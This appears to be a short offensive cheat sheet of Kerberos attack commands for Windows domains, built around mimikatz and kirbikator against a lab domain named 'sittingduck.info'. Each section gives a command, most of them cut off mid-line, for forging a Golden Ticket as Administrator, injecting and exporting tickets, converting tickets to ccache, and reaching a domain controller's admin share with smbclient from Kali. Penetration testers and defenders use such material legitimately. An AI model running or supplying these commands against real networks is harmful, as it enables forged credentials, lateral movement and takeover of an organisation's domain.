Kerberos Modules
1 | .#####. mimikatz 2.0 alpha (x64) release "Kiwi en C" (Oct 9 2015 00:33:13) |
Golden Ticket
1 | mimikatz # kerberos::golden /user:Administrator /domain:sittingduck.info /sid:S- |
Pass the Ticket
1 | mimikatz # kerberos::ptt gold.kirbi |
Injecting tickets with Kirbikator
1 | C:\Users\notanadmin\Desktop>kirbikator.exe lsa gold.kirbi |
Exporting active tickets
1 | mimikatz # kerberos::list /export |
PSEXEC with standard Kerberos tickets
1 | mimikatz # kerberos::list |
Convert Mimikatz Kerberos ticket to CCache and use
1 | C:\Users\notanadmin\Desktop>kirbikator.exe ccache "2-40a50000-uberuser@cifs~dc1. |
Method 1
1 | KRB5CCNAME=uberuser@SITTINGDUCK.INFO.ccache smbclient -k //dc1.sittingduck.info/c$ |
Method 2
1 | root@kali:~# apt-get install krb5-user |